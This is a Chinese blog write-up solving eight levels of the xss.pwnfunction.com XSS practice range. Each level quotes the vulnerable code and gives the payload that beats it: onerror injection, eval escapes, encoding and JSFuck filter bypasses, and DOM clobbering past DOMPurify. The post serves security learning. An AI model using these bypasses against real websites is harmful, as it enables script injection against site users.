复现DOM破坏案例

最新推荐文章于 2024-09-25 14:45:14 发布
最新推荐文章于 2024-09-25 14:45:14 发布
阅读量1k 收藏 26
点赞数 14
文章标签: 服务器 前端 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_61552310/article/details/141287777
版权

目录

准备工作:

第一关

第二关

第三关

第四关

第五关

第六关

第七关

第八关

准备工作:

做好代理然后访问靶场 https://xss.pwnfunction.com/

第一关

Ma Spaghet! 让我们 Let's go~

这是源代码部分:

<!-- Challenge -->
<h2 id="spaghet"></h2>
<script>
    spaghet.innerHTML = (new URL(location).searchParams.get('somebody') || "Somebody") + " Toucha Ma Spaghet!"
</script>

这里的意思为获取url中的get参数somebody,如果有那么就设置h2的值为get参数的值,如果没有则为"Somebody" + " Toucha Ma Spaghet!"

接下来我们输入?somebody=<script>alert(1)</script>发现并没有弹窗,正常在h2标签中会执行,

通过查阅资料发现在html 5中指定不执行由 innerHTML插入的 <script></script>标签,这就是不能弹窗的原因

innerHTML 只过滤了<script>,我们可以使用img标签来触发

?somebody=<img src=1 οnerrοr="alert(1)">

第二关

源代码如下:

<!-- Challenge -->
<h2 id="maname"></h2>
<script>
    let jeff = (new URL(location).searchParams.get('jeff') || "JEFFF")
    let ma = ""
    eval(`ma = "Ma name ${jeff}"`)
    setTimeout(_ => {
        maname.innerText = ma
    }, 1000)
</script>

这里我们尝试闭合单引号后,让程序执行我们输入的alert(1),然后把后面的部分注释掉

?jeff=aaa" ;alert(1);//

值得一提的是还有一种方法,通过-来连接

?jeff=aaa" ;-alert(1)-"

第三关

源代码如下:

<!-- Challenge -->
<div id="uganda"></div>
<script>
    let wey = (new URL(location).searchParams.get('wey') || "do you know da wey?");
    wey = wey.replace(/[<>]/g, '')
    uganda.innerHTML = `<input type="text" placeholder="${wey}" class="form-control">`
</script>

这里对<>符号进行了过滤,我们尝试闭合双引号

?wey=aaa" οnclick="alert(1)

由于这里需要去配合点击输入框,然而题目要求是自动触发,因此我们需要去使用另一个方法

?wey=aaa" οnfοcus="alert(1)" autofocus="true

这里的onfocus是聚焦,autofocus是自动聚焦,这样就可以自动触发

第四关

源代码如下:

<!-- Challenge -->
<form id="ricardo" method="GET">
    <input name="milos" type="text" class="form-control" placeholder="True" value="True">
</form>
<script>
    ricardo.action = (new URL(location).searchParams.get('ricardo') || '#')
    setTimeout(_ => {
        ricardo.submit()
    }, 2000)
</script>

这段代码的意思为在2秒后对from表单进行提交,提交的位置就是ricardo.action,这里提交js代码就可以被识别了

?ricardo=javascript:alert(1)

第五关

源代码如下:

<!-- Challenge -->
<h2 id="will"></h2>
<script>
    smith = (new URL(location).searchParams.get('markassbrownlee') || "Ah That's Hawt")
    smith = smith.replace(/[\(\`\)\\]/g, '')
    will.innerHTML = smith
</script>

这里虽然使用smith.replace进行了过滤,但是我们可以使用编码的方式来绕过

?markassbrownlee=<img src=1 οnerrοr="alert(1)">

在url中,如果我们直接将alert中的1进行urlcode编码浏览器传递给smith时会自动解码,但是url不能直接传递实体编码。

所以我们可以先将1进行实体编码,再对实体编码进行urlcode编码

markassbrownlee=<img src=1 οnerrοr="alert(1)">
实体编码:
markassbrownlee=<img src=1 οnerrοr="alert&#x0028;&#x0031;&#x0029;">
urlcode编码:
markassbrownlee=<img src=1 οnerrοr="alert%26%23x0028%3B%26%23x0031%3B%26%23x0029%3B">

第六关

源代码如下:

/* Challenge */
balls = (new URL(location).searchParams.get('balls') || "Ninja has Ligma")
balls = balls.replace(/[A-Za-z0-9]/g, '')
eval(balls)

使用JSFuck绕过,JS代码混淆为只包含[]()!+这6种字符的字符串

先进行JSFuck加密,再用URL编码
原始注入:?balls=alert(1337)
 
(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][[]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[!+[]+!+[]]]+[+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]]+[!+[]+!+[]+!+[]+!+[]+!+[]+!+[]+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(![]+[])[!+[]+!+[]]])[!+[]+!+[]+[+[]]]
 
最终注入
?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)()

第七关

源代码如下:

/* Challenge */
mafia = (new URL(location).searchParams.get('mafia') || '1+1')
mafia = mafia.slice(0, 50)
mafia = mafia.replace(/[\`\'\"\+\-\!\\\[\]]/gi, '_')
mafia = mafia.replace(/alert/g, '_')
eval(mafia)

这里定义一个匿名函数,然后构造payload,使用正则表达式来绕过alert字符串的检测

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

第八关

源代码如下:

<!-- Challenge -->
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

这里代码使用了DOMPurify第三方库来过滤非法字符,因此setTimeout(ok,2000)为注入点,只要向ok这个变量注入即可成功

首先构造ok,id=ok,由于a标签会返回href的值,因此选择<a>标签作为构造对象

href的值要遵守protocol:uri的格式,查看DOMPurify的源码,支持的合法的协议有mailto, tel, xmpp等

?boomer=<a%20id=ok%20href=tel:alert(1337)>

21级-刘先森
关注
[系统安全] 十五.Chrome密码保存功能渗透解析、Chrome蓝屏漏洞及音乐软件漏洞复现
杨秀璋的专栏
01-21 9980
作者前面详细介绍了熊猫烧香病毒的逆向分析过程。这篇文章换个主题继续介绍,本文将对Chrome浏览器保留密码的功能进行渗透解析;同时复现一个最近流行的漏洞,通过Chrome浏览器实现Win10蓝屏;最后介绍音乐软件的加密功能及漏洞复现。这些基础性知识不仅和系统安全相关,同样与我们身边的APP、常用软件及系统紧密联系,希望这些知识对您有所帮助,更希望大家提高安全意识,开发厂商进行相关的漏洞修补,安全保障任重道远。
[系统安全] 九.Windows漏洞利用之MS08-067远程代码执行漏洞复现及深度防御
杨秀璋的专栏
12-28 9642
系统安全系列作者将深入研究恶意样本分析、逆向分析、攻防实战和Windows漏洞利用等,通过在线笔记和实践操作的形式分享与博友们学习,希望能与您一起进步。前文介绍了Windows远程桌面服务漏洞(CVE-2019-0708),该高危漏洞利用方式是通过远程桌面端口3389,RDP协议进行攻击。这篇文章将详细讲解MS08-067远程代码执行漏洞(CVE-2008-4250),它是Windows Server服务RPC请求缓冲区溢出漏洞,利用445端口,并通过Metasploit工具获取shell及进行深入的操作。
复现dom破坏案例和靶场
weixin_73298423的博客
08-18 780
dom破坏
复现DOM破坏案例&靶场
GaoXianGaoXian的博客
08-18 316
复现DOM破坏案例&靶场
XSS-复现dom破坏案例和靶场
山月不问人间事
08-18 1006
首先是传给wey一个值,然后赋值给变量let wey,然后这里过滤了<>尖括号,最后将我们的变量wey内容传给Uganda,显示在输入框中,Uganda也带一个inner HTML的属性,所以我们不能使用script标签,那就看看其他的思路;可以看到括号丢失 ,因为url在传参时,会将我们的特殊符号进行解码,但我们传递的是html的实体编码,所以问题出现在了这里,那么我们再将实体编码再进行次url编码。所以我们这里只能换一种思路,他不能加标签,那我们看能不能直接闭合ma,之后执行我们的代码。
Dom破坏案例复现
2302_80859314的博客
08-17 841
这里执行代码后得到了两个object的值分别为HTMLAreaElement()和HTMLAnchorElement(),这两个标签其实分别为<area>及<a>这两个方法返回的值为非对象(字符串), 我们可以通过href属性利用这两个标签进行字符串的转换。这里的JS代码是没有任何关于ok参数的定义的,所以我们可以使用DOM破坏,通过DOM破坏,将HTML元素注入到DOM中。在这里,ok变量被执行,但它不存在。这个方法不存在了,取而代之的是img标签,这里其实就是实现了覆盖的作用,破坏了原有的方法。
DOM破坏案例复现
m0_64802817的博客
08-18 257
在动画开始的时候会触发onanimationstart事件,因为el.attributes已经被后门的两个input占了,所以标签里面的内容不会删除,只会删除input
DOM破坏原理与漏洞复现
m0_74344277的博客
09-05 172
Dom 破坏Dom Clobbering(Dom破坏) 就是⼀种将 HTML 代码注入页面中以操纵 DOM 并最终更改页面上 JavaScript 行为的技术。在无法直接XSS的情况下,我们就可以往DOM Clobbering 这⽅向考虑了。其实 Dom Clobbering 比较简单,我们看几个简单的例⼦就能知道它是⼲什么了的。1.获取标签通过打印<img>标签中的id或者name属性值,我们获取到了整个<img>标签从中我们也发现了规律,直接打印x,y不管是id还是name都可以打印出来。
DOM破环和两个实验的复现
lyz_yyds107的博客
08-02 273
这就又涉及到了循环的过程中,attr首先匹配到的是src元素,然后就会直接删除,删除了之后,紧跟着的这个onerror会自动往前移动,来替代了,之前这个位置,这时候我们要知道索引也跟着变化了,所以再循环的时候发现没有了,就跳出了循环,所以留下了这个onerror。首先我们来了解一下DOM和window的关系,如果你在HTML中,设定一个有id的元素之后,在js中就可以直接操作,又由于js的作用域规则,就算直接用btn也可以,因为在当前的作用域找到时就会往上找,一路找到window。还是报错,为什么呢?...
软件测试-面试题(基础+性能+安全)
hyhrosewind
08-08 1299
失效恢复测试一般是对具有负载均衡的系统或者是具有备份的系统进行的,主要是为了测试当系统局部发生故障时,是否会对全局产生较大的影响,产生的影响是否在可以接受的范围内,以及用户是否能够继续使用系统(还要关注失效后,系统还能支持多少用户并发操作,以及出现这种情况,可以采用哪些应急方案来快速解决问题。12)现网性能测试:在真实的环境下做性能测试(为了得出最真实的数据,这种类型的测试要注意一些问题对网络性能的影响,比如占用过多的带宽,影响其他业务,垃圾数据的清理等。测试项一般只写一个测试目的,不要一次测试多个点;
红队专题-Web安全/渗透测试-注入攻击
aming小老弟
10-27 191
Sql Inject(SQL注入)概述 哦,SQL注入漏洞,可怕的漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一的漏洞, 其中注入漏洞里面首当其冲的就是数据库注入漏洞。一个严重的SQL注入漏洞,可能会直接导致一家公司破产!SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。从而导致数据库受损(被脱裤、被删除、甚至整个服务器权限沦陷)。
统信服务器操作系统【Cron定时任务服务】
RZer的博客
09-23 1233
Cron定时任务服务服务介绍、服务管理、服务配置
使用docker创建zabbix服务器
a15864923744的博客
09-20 885
这几个容器创建后是UP状态就可以使用浏览器尝试访问 http://宿主机IP:8080,期间遇到问题是MySQL容器使用mysql:9.0镜像总是出错,所以用了mysql:8.0。zabbix默认账号密码是:Admin/zabbix。#创建zabbix后端服务容器。#创建zabbix前端服务容器。#创建MySQL容器。
FTP 服务器 linux安装
最新发布
weixin_45368812的博客
09-25 988
ftp 连接失败:500 OOPS: vsftpd: refusing to run with writable root inside chroot()ftp 连接失败:530 permission deniedftp 连接成功,但是能访问到上级目录和其他目录提示:以下是本篇文章正文内容,下面案例可供参考注意: 以下全部操作都是基于 SELinux= disable、防火墙关闭。
Linux常用命令
wang_san_sui_的博客
09-23 1045
Linux 系统提供了大量的命令来管理系统和处理文件。:创建新文件或更新现有文件的时间戳。:报告文件系统的磁盘空间使用情况。:查看当前正在运行的进程的状态。:从排序好的文件中删除重复行。:显示系统中正在运行的进程。:安全地复制文件到远程机器。:打印当前工作目录的路径。:移动或重命名文件/目录。:更改文件或目录的所有者。:更改文件或目录的权限。:在文件系统中查找文件。:安全地登录到远程机器。:模式扫描和处理语言。:对文件内容进行排序。:查看文件的开始部分。:查看文件的结束部分。:检查磁盘使用情况。
统信服务器操作系统【开机自启动】配置方法
RZer的博客
09-23 814
开机自启动的四种配置方法,包括systemctl命令、rc.local文件、crontab任务,通过desktop配置开机自动,前三种方法适合后台程序或者脚本启动,最后一种方法适合图形化程序启动。
RtspServer:轻量级RTSP服务器和推流器
Where there is life, there is hope.
09-24 1029
RtspServer是由 **PHZ76** 开发的高效、可定制的实时流媒体服务器解决方案。它基于作者编写的网络基础库 **xop**,允许开发者轻松处理和分发实时音视频流。项目提供了一个名为 **DesktopSharing** 的示例应用,可以捕获桌面和麦克风声音,并在编码后通过 RTSP 协议进行转发和推流。该项目支持 Windows 和 Linux 平台,代码量少,相比于 live555 等经典的流媒体库,RtspSer
Linux 基本指令的学习
sswithyou的博客
09-24 1149
举个例子 现在我们在root的路径下,面前有dyx mytest等文件 ,cd +目录或者文件 就可以进去,相当于windows进入文件夹一样,当然我们也可以。2. 当第二个参数类型是文件时,mv命令完成文件重命名,此时,源文件只能有一个(也可以是源目录名),它。3.同一个文件下,拷贝的和被拷贝的不能一样的名字,因为文件具有唯一性,否则用路径寻找文件其实空谈。指令用于复制文件或目录,如同时指定两个以上的文件或目录,且最后的目的地是一个已经存在的目录,:对于目录,该命令列出该目录下的所有子目录与文件。
复现经典漏洞:MS08-067分析与影响
"ms08-067复现" 本文主要介绍了Windows系统中的一个经典漏洞——MS08-067,以及如何复现这一漏洞,适合初学者学习和研究。漏洞MS08-067是由于Windows Server服务处理远程过程调用(RPC)请求时存在的缓冲区溢出问题...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值